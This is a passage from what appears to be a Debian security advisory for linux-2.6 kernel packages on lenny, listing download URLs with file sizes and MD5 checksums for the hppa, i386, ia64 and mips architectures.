c5cdc0e069cb6ede4e78bbde3c1c9d38\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc_2.6.26-21lenny3_hppa.deb\n    Size/MD5 checksum:   298428 0a9230bddf14ff72e72f5f8364a7065b\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc64_2.6.26-21lenny2_hppa.deb\n    Size/MD5 checksum: 17065708 68733ed99b8bf117045e91993d3e34e1\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_hppa.deb\n    Size/MD5 checksum:   760596 c7073dae32f1da80546996f9be99dc4b\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc64-smp_2.6.26-21lenny3_hppa.deb\n    Size/MD5 checksum: 17606836 e6b141686e83c8e87708eb32ba5f765b\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc64_2.6.26-21lenny3_hppa.deb\n    Size/MD5 checksum: 17064682 6ee4beb8ddc3ec65d2e44ef2abc52711\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-hppa_2.6.26-21lenny3_hppa.deb\n    Size/MD5 checksum:   108774 dcaac67bb66ab3993c236e0c39cbc863\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny2_hppa.deb\n    Size/MD5 checksum:  3602414 5ae801276f46a79329e53e9b6f7ae5c8\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc-smp_2.6.26-21lenny2_hppa.deb\n    Size/MD5 checksum:   300986 eeeab86991aa8d4d2570d7d1efe7e0c1\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc_2.6.26-21lenny3_hppa.deb\n    Size/MD5 checksum: 15732620 4142cd60023a49fc5cba7e524a0e677e\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc64_2.6.26-21lenny3_hppa.deb\n    Size/MD5 checksum:   300704 247bcb4b71e6d7fea75987dcddbfb843\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc64_2.6.26-21lenny2_hppa.deb\n    Size/MD5 checksum:   299420 d976a36fe5f633475bf2c0c06ef10b43\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc64-smp_2.6.26-21lenny3_hppa.deb\n    Size/MD5 checksum:   301474 c0ee7622dd755b3b5fece4fab4814b37\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc-smp_2.6.26-21lenny3_hppa.deb\n    Size/MD5 checksum:   301264 f3ebd75938c150e31532d22957cae48a\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny2_hppa.deb\n    Size/MD5 checksum:   108592 caa307b157d81c1b02d2ad0c0f342fcb\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc_2.6.26-21lenny2_hppa.deb\n    Size/MD5 checksum:   298662 afdc4001e99590a38eff17434f8dbf6e\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-hppa_2.6.26-21lenny2_hppa.deb\n    Size/MD5 checksum:   108624 7fdd70b403b07234c57272a5956c7637\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny2_hppa.deb\n    Size/MD5 checksum:   760622 dc5b55d7cd8aec6cac4f4de8d3908138\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_hppa.deb\n    Size/MD5 checksum:   108748 8231281dd48d07f51a6c76cae28b03b6\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc64-smp_2.6.26-21lenny2_hppa.deb\n    Size/MD5 checksum: 17607646 3fbc0828d0dc3c8730bebd789cf6a99c\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc_2.6.26-21lenny2_hppa.deb\n    Size/MD5 checksum: 15734148 24cb2bcfc207fe3b0fa5063c043e0485\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_hppa.deb\n    Size/MD5 checksum:  3602208 9faa4dde7cf95d0eceb8173b0797bab4\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc64-smp_2.6.26-21lenny2_hppa.deb\n    Size/MD5 checksum:   301262 5585e2c5657f24afec825d9c48069afb\n\ni386 architecture (Intel ia32)\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-686-bigmem_2.6.26-21lenny3_i386.deb\n    Size/MD5 checksum:   400552 f0ab806af132585894a0b4d488f681e1\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-486_2.6.26-21lenny1_i386.deb\n    Size/MD5 checksum: 20182002 68bf490913715a3a4893a0f3030fd08a\n  http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.26-2-xen-686_2.6.26-21lenny3_i386.deb\n    Size/MD5 checksum:   108698 05e475352e3e9e7f7ca058b02da5e596\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-xen-686_2.6.26-21lenny2_i386.deb\n    Size/MD5 checksum:   395282 9ca23e9ea72d7267547488df93ed3891\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_i386.deb\n    Size/MD5 checksum:   751496 4bb4db205fe5a3e5b08a2f96ef535dae\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-openvz-686_2.6.26-21lenny3_i386.deb\n    Size/MD5 checksum: 20512122 404f343a28b757905e08c4ed06938025\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-openvz-686_2.6.26-21lenny2_i386.deb\n    Size/MD5 checksum:   414984 17003e8c4d69f33f139d0b838253296f\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny1_i386.deb\n    Size/MD5 checksum:  3754214 c13bbf441f92bd7e5d443bcc120056bf\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny2_i386.deb\n    Size/MD5 checksum:  3804582 0703c8ce4817e2691bd967eb2a1e2aaa\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-486_2.6.26-21lenny2_i386.deb\n    Size/MD5 checksum: 20309414 e71604df8f47dbe29e4eb480d523dcf4\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-openvz-686_2.6.26-21lenny3_i386.deb\n    Size/MD5 checksum:   406794 2363770c63d9f8466ccd7d705b0f52c2\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-xen_2.6.26-21lenny3_i386.deb\n    Size/MD5 checksum:  3854214 9aa41ff3e4c1dd59cd75c504ad138251\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-686_2.6.26-21lenny2_i386.deb\n    Size/MD5 checksum: 20369630 e8bd60ec3f9da0fadbb042abaf36c139\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-686_2.6.26-21lenny2_i386.deb\n    Size/MD5 checksum:   406598 acdc58c26d377b6dd5875734aa065ac0\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-686-bigmem_2.6.26-21lenny1_i386.deb\n    Size/MD5 checksum: 20335314 dcb229f6502f1917863bced44e26415e\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.26-2-xen-686_2.6.26-21lenny1_i386.deb\n    Size/MD5 checksum: 18044830 1ec4594316ac2f6b6fae6aabaa9b2375\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-amd64_2.6.26-21lenny1_i386.deb\n    Size/MD5 checksum: 20875430 71438d596864b15028d568cfc15086d8\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny1_i386.deb\n    Size/MD5 checksum:  3721614 7fc667d57644e72926ad94679040808f\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-686_2.6.26-21lenny1_i386.deb\n    Size/MD5 checksum: 20242322 bb675ba8ac183757940fc2f9a38cff3f\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-openvz_2.6.26-21lenny1_i386.deb\n    Size/MD5 checksum:  3777298 7bc44c56c67d7347d1d14b33969d43d0\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.26-2-xen-686_2.6.26-21lenny3_i386.deb\n    Size/MD5 checksum: 18043878 bd5cc921dc8b99aee2349949b268742d\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-686_2.6.26-21lenny1_i386.deb\n    Size/MD5 checksum:   400030 5cf9b3313efc0353d53270ff6c810b52\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-openvz-686_2.6.26-21lenny1_i386.deb\n    Size/MD5 checksum:   407430 a0005c58b226ce7a2c6cbd32c52e4707\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-i386_2.6.26-21lenny2_i386.deb\n    Size/MD5 checksum:   108652 125393b32f78a83b5487f86609caef9c\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-686_2.6.26-21lenny3_i386.deb\n    Size/MD5 checksum: 20242572 21545fdd42b8b74a9d76a5fdefff5d71\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-i386_2.6.26-21lenny1_i386.deb\n    Size/MD5 checksum:   108470 39f81b9bc97be71c303134ea39d39668\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-i386_2.6.26-21lenny3_i386.deb\n    Size/MD5 checksum:   108760 ff55bc8837a8e5d3f1c9f846c3b49df8\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-openvz_2.6.26-21lenny2_i386.deb\n    Size/MD5 checksum:  3863030 f60938819e03e8dc8dcfa4998c02acd2\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-686-bigmem_2.6.26-21lenny2_i386.deb\n    Size/MD5 checksum: 20465042 23bc3025baf8c3fc11cfd182d928a16e\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-amd64_2.6.26-21lenny2_i386.deb\n    Size/MD5 checksum: 20979960 77e4935a71746ca71a48a6fec79aace8\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-486_2.6.26-21lenny2_i386.deb\n    Size/MD5 checksum:   407034 d2671fbd82a221a68c7ddaba28e770cc\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-686_2.6.26-21lenny3_i386.deb\n    Size/MD5 checksum:   399662 054c4c2158e54a5e340aa61bf79c8621\n  http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.26-2-xen-686_2.6.26-21lenny2_i386.deb\n    Size/MD5 checksum:   108586 b9d0b66a7f7d3cd72220a28b1a16e3db\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-686-bigmem_2.6.26-21lenny1_i386.deb\n    Size/MD5 checksum:   400428 d166f07671c10db0e501e005d59c0dbe\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-686_2.6.26-21lenny3_i386.deb\n    Size/MD5 checksum: 20217898 fa4b16b6a046746c752edaa45fd4fc64\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-openvz-686_2.6.26-21lenny2_i386.deb\n    Size/MD5 checksum: 20640882 06e18bca999a2c1e460259b6c4682aa3\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-amd64_2.6.26-21lenny3_i386.deb\n    Size/MD5 checksum: 20875948 baba9d22a44a1ee0814f7acd950727e1\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny2_i386.deb\n    Size/MD5 checksum:   108596 9a34da9105c07f3fd7caaafa38fd4a09\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny1_i386.deb\n    Size/MD5 checksum:   108418 85098acb63d71b952a5e2bec67315522\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-amd64_2.6.26-21lenny1_i386.deb\n    Size/MD5 checksum:   389694 403c43df5849b1b00101dcd77a0ffa27\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.26-2-xen-686_2.6.26-21lenny2_i386.deb\n    Size/MD5 checksum: 18160862 f7852726d5fb05ce76e3ce406ca491ae\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-686_2.6.26-21lenny1_i386.deb\n    Size/MD5 checksum:   400640 a46d929bd03a31d8455057852186cf04\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-openvz_2.6.26-21lenny3_i386.deb\n    Size/MD5 checksum:  3777542 b3a9d9c191efecc4ebdead63e0e1a1b6\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-686-bigmem_2.6.26-21lenny3_i386.deb\n    Size/MD5 checksum: 20335320 c257003a37486c77eb7236b74a1d5bc4\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_i386.deb\n    Size/MD5 checksum:   108706 80501c6c7b452434f9afccea416b709f\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny3_i386.deb\n    Size/MD5 checksum:  3754468 1eb8fcf5397026e02228ad5896598f44\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-xen-686_2.6.26-21lenny2_i386.deb\n    Size/MD5 checksum:  1594926 2405c55c21f13bacecfec840c81216fe\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny1_i386.deb\n    Size/MD5 checksum:   751384 c150bf84cf8b4f41309bb353d6e0f0ea\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-xen-686_2.6.26-21lenny3_i386.deb\n    Size/MD5 checksum:   387262 0b501ef2dd8f259e336c70bfac6db9a4\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-686_2.6.26-21lenny3_i386.deb\n    Size/MD5 checksum:   400902 031d09121cb1b04cf75fcc7fb1fa4925\n  http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.26-2-xen-686_2.6.26-21lenny1_i386.deb\n    Size/MD5 checksum:   108414 b9cc53f856782ac942ca3b98ece340e0\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-486_2.6.26-21lenny3_i386.deb\n    Size/MD5 checksum: 20182500 d4dc224037d71e76f7ed3878f3aa9630\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-686_2.6.26-21lenny2_i386.deb\n    Size/MD5 checksum: 20341764 e59a069f5d07703913f9488cf2c17021\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_i386.deb\n    Size/MD5 checksum:  3721846 229b2c54999ea5a7e3679bf5f4a2d473\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny2_i386.deb\n    Size/MD5 checksum:   765918 d172b7dcad29aa4ee04def9a221d6fba\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-686-bigmem_2.6.26-21lenny1_i386.deb\n    Size/MD5 checksum:   400638 9612c907573cf5785e91bdd309c97ab4\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-686_2.6.26-21lenny1_i386.deb\n    Size/MD5 checksum: 20217866 cd265b0c5c7940df3723df5b1e6b8a0b\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-686_2.6.26-21lenny2_i386.deb\n    Size/MD5 checksum:   408114 33446a9ba1aaf26565b86dcd7991310c\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-686-bigmem_2.6.26-21lenny2_i386.deb\n    Size/MD5 checksum:   408332 e7b92f9c7e2281e2050156a126481d0b\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-xen-686_2.6.26-21lenny1_i386.deb\n    Size/MD5 checksum:   388204 f05bb15f0d5ac59b92c0e7e58666f582\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-686-bigmem_2.6.26-21lenny2_i386.deb\n    Size/MD5 checksum:   407184 759e686be26e57c5fa7831d410a59b42\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-686-bigmem_2.6.26-21lenny3_i386.deb\n    Size/MD5 checksum:   400086 47b28b4325c193b07bd877e849d015c8\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-486_2.6.26-21lenny3_i386.deb\n    Size/MD5 checksum:   399920 8c8f053d50d3c7e72e5543f9a36fd6d5\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-amd64_2.6.26-21lenny2_i386.deb\n    Size/MD5 checksum:   396974 0fae2cc8843879be33a567cd4247d77a\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-xen-686_2.6.26-21lenny1_i386.deb\n    Size/MD5 checksum:  1594510 86fed72851b3bbd9af666dca50a74718\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-xen-686_2.6.26-21lenny3_i386.deb\n    Size/MD5 checksum:  1594836 932befcaafaf934e0d49110cb144933e\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-486_2.6.26-21lenny1_i386.deb\n    Size/MD5 checksum:   399700 a2824e942fb9f0365c29f32f301da907\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-686-bigmem_2.6.26-21lenny1_i386.deb\n    Size/MD5 checksum: 20359926 7c7e0e8cff5215ad2b683dafc3ed6a60\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-xen_2.6.26-21lenny2_i386.deb\n    Size/MD5 checksum:  3944378 c4c879bbbaa703dc76a8d163cc9d0d00\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-686-bigmem_2.6.26-21lenny2_i386.deb\n    Size/MD5 checksum: 20490380 679b0811cd187d7e624cd089da8a43b1\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-686-bigmem_2.6.26-21lenny3_i386.deb\n    Size/MD5 checksum: 20359822 5cee4d1bfbaf186efc124b7aba33e6e0\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-xen_2.6.26-21lenny1_i386.deb\n    Size/MD5 checksum:  3853962 5e3d260ca6e9f5436b12c30a0eeec239\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-openvz-686_2.6.26-21lenny1_i386.deb\n    Size/MD5 checksum: 20511694 cd40e02a7dd10aa8699a54ae5540c68e\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-amd64_2.6.26-21lenny3_i386.deb\n    Size/MD5 checksum:   389638 245b487189ca0af34526b8f770094172\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny2_i386.deb\n    Size/MD5 checksum:  3839050 85f7e26766452c9ce8e88d43c83fecbc\n\nia64 architecture (Intel ia64)\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-itanium_2.6.26-21lenny3_ia64.deb\n    Size/MD5 checksum:   359070 86419da16f001cb7f6478b592cc0a47f\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny1_ia64.deb\n    Size/MD5 checksum:   108430 edba219dabfb91c9c7b2fa3d9f4a4bc7\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-mckinley_2.6.26-21lenny3_ia64.deb\n    Size/MD5 checksum: 34359310 89151596f07a1d74a7585d5209bc577f\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-mckinley_2.6.26-21lenny1_ia64.deb\n    Size/MD5 checksum:   357818 98556ca82088020d3599d5f2261e7e0d\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-mckinley_2.6.26-21lenny3_ia64.deb\n    Size/MD5 checksum:   358114 b27fddaebd882ea5442fb858f9dfd4bf\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-mckinley_2.6.26-21lenny1_ia64.deb\n    Size/MD5 checksum: 34362562 f584be340a1d6fad3d55586d605e20c1\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny1_ia64.deb\n    Size/MD5 checksum:  3689594 b153ada0e53662ce15c1c89bc2adfa56\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-itanium_2.6.26-21lenny1_ia64.deb\n    Size/MD5 checksum:   357710 19bddfe6c9db67ac1db5b5542dcd58f1\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-itanium_2.6.26-21lenny1_ia64.deb\n    Size/MD5 checksum: 34109258 059e79f42c661f2e1549a6354caa43ce\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-itanium_2.6.26-21lenny3_ia64.deb\n    Size/MD5 checksum: 34107508 ecaa06007b46aafebb67e3b4f9a05b2d\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-itanium_2.6.26-21lenny3_ia64.deb\n    Size/MD5 checksum:   357568 00dd418b3433ca1f93f4368191d8b72c\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny1_ia64.deb\n    Size/MD5 checksum:  3657036 814b6e4b81ab9173f027f556615d0bc3\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-mckinley_2.6.26-21lenny3_ia64.deb\n    Size/MD5 checksum:   357550 9f3c74754dc8f874e3815e621e143754\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny1_ia64.deb\n    Size/MD5 checksum:   750092 4a6ae1dd8acbbf0180c71954694b1526\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_ia64.deb\n    Size/MD5 checksum:   108708 f1285ff67a0f561915765bcb50ecbead\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny3_ia64.deb\n    Size/MD5 checksum:  3689576 20a59a5041e7647d0391f854686664a7\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-ia64_2.6.26-21lenny1_ia64.deb\n    Size/MD5 checksum:   108462 1c02ca719c0feb638de4f4f5c256eb84\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-itanium_2.6.26-21lenny1_ia64.deb\n    Size/MD5 checksum:   357964 c45479bde1eb1f6f5e2c362ff947a0e5\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_ia64.deb\n    Size/MD5 checksum:  3657030 4482b2b529976d961f3020c77222693d\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-mckinley_2.6.26-21lenny1_ia64.deb\n    Size/MD5 checksum:   357208 fa7766e518316520ab7dc1272ca58ece\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-mckinley_2.6.26-21lenny3_ia64.deb\n    Size/MD5 checksum: 34284740 d90557ca07fc3e8c301ac7eecb7af9bd\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-mckinley_2.6.26-21lenny1_ia64.deb\n    Size/MD5 checksum: 34289814 c5bcd6bd38d18693b2f211cda0d4d68e\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-ia64_2.6.26-21lenny3_ia64.deb\n    Size/MD5 checksum:   108736 ff3225f77a14a14e998443a8cb8d296a\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_ia64.deb\n    Size/MD5 checksum:   750184 3fc4607bbae8e1646b2022c405906cb2\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-itanium_2.6.26-21lenny1_ia64.deb\n    Size/MD5 checksum: 34172758 2c92b359fd81b2698905506af74eed9b\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-itanium_2.6.26-21lenny3_ia64.deb\n    Size/MD5 checksum: 34170826 bb4ed05b498a4f153ff5ed49d295055a\n\nmips architecture (MIPS (Big Endian))\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-5kc-malta_2.6.26-21lenny2_mips.deb\n    Size/MD5 checksum: 29281456 5b9a8e4a0a9fa48b5cedfcc57839e414\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1-bcm91250a_2.6.26-21lenny2_mips.deb\n    Size/MD5 checksum:   296956 9dcc3a6d73cc4703251ad1ae76ee30a7\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-5kc-malta_2.6.26-21lenny3_mips.deb\n    Size/MD5 checksum: 29278756 9c890b56c619dea8c6786149f065b409\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1a-bcm91480b_2.6.26-21lenny3_mips.deb\n    Size/MD5 checksum:   297228 c24d99d38ed9c0f76aef1db87ea9927f\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-4kc-malta_2.6.26-21lenny3_mips.deb\n    Size/MD5 checksum:   353130 526563ac3ea7cae71a2431d1c16d5148\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_mips.deb\n    Size/MD5 checksum:   744330 30d4553c7165d0636d44ec819573c378\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1-bcm91250a_2.6.26-21lenny3_mips.deb\n    Size/MD5 checksum: 20135908 7852982d46bc9c28f8c6df1f069ebd0b\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_mips.deb\n    Size/MD5 checksum:  3893146 cf461075d9af08b66a1565123df5db0f\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_mips.deb\n    Size/MD5 checksum:   108708 9f84a606392f0ea233a6560be5acefd9\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-r4k-ip22_2.6.26-21lenny3_mips.deb\n    Size/MD5 checksum: 11493164 0f75a57fcc89d5c9e3274d76d3b0dd01\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-r4k-ip22_2.6.26-21lenny3_mips.deb\n    Size/MD5 checksum:   255094 aba773b89f23e5b1d39a58486c000d85\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-5kc-malta_2.6.26-21lenny3_mips.deb\n    Size/MD5 checksum:   350880 62f184f11f05d085dd9e5ca8038864d3\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-r5k-ip32_2.6.26-21lenny2_mips.deb\n    Size/MD5 checksum: 15652112 cd6f08d973b6d56d8ad1d348ead030fe\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-r5k-ip32_2.6.26-21lenny3_mips.deb\n    Size/MD5 checksum:   280804 a283c8f566d27f8429017cc280fae633\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-r4k-ip22_2.6.26-21lenny2_mips.deb\n    Size/MD5 checksum:   254932 62bb2cb1fb9920375c15d7566aa3711d\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny2_mips.deb\n    Size/MD5 checksum:   744386 dd652dfa4e958776dde0af9554972399\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-4kc-malta_2.6.26-21lenny3_mips.deb\n    Size/MD5 checksum: 23361964 1154ed62d11f482dc7aa0195754dd2df\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1a-bcm91480b_2.6.26-21lenny2_mips.deb\n    Size/MD5 checksum:   296378 ac0de038db87e9909627f0cc2edeaed9\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny2_mips.deb\n    Size/MD5 checksum:  3893178 25c2f247293ab5fafb2396d7ebe20be4\n  